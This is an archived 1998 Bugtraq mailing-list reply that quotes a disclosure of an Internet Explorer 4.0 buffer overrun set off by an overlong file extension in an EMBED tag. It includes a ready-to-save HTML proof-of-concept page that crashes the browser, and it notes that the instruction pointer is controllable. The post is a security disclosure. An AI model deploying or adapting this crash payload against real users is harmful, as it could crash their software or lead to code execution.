Bugtraq mailing list archives
Re: MSIE buffer overrun
From: pt95cho () STUDENT HK-R SE (Christian Holmqvist)
Date: Fri, 20 Mar 1998 17:13:10 +0100
On Fri, 20 Mar 1998, Georgi Guninski wrote: Hi! This not only crashes MSIE4 but also Eudora4.0 (yes the mail reader...) I can't read this mail with out a crash. I had to read it in pine on a unix system. Cheers Christian
Microsoft Internet Explorer 4.0 (don't know for other versions) can be crashed and eventually made execute arbitrary code with a little help of the <EMBED> tag. The following: <EMBED SRC=file://C|/A.ABOUT_200_CHARACTERS_HERE___________________> opens a dialog box and closes IE 4.0. It seems that the long file extension causes stack overrun. The stack is smashed - full with our values, EIP is also ours and CS=SS. So probably a string could be constructed, executing code at the client's machine. Solution: Do not browse hostile pages. To try this: http://www.geocities.com/ResearchTriangle/1711/msie.html Georgi Guninski http://www.geocities.com/ResearchTriangle/1711 -----------------------cut here and save as crashmsie.html--------------------- <HTML> Trying to crash IE 4.0 <EMBED SRC=file://C|/A.012345678901234567890123456789012345678901234567890123456789012345678901234567890123456756789012345678901234567890123456789012345678901234567890123456789012345678901234567890123456789012345678901234567890123456789012345678901234567890123456789012345678901234567890123456789> 40 80 160 170 180 190 200 </HTML>
Mvh Christian /~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~\ | Christian Holmqvist | | Email: pt95cho () student hk-r se | | Tele: 0457-17754 | \________________________________/
Current thread:
- MSIE buffer overrun Georgi Guninski (Mar 20)
- Re: MSIE buffer overrun Christian Holmqvist (Mar 20)
- <Possible follow-ups>
- Re: MSIE buffer overrun Russ (Mar 20)
- Re: MSIE buffer overrun matt sawkill (Mar 20)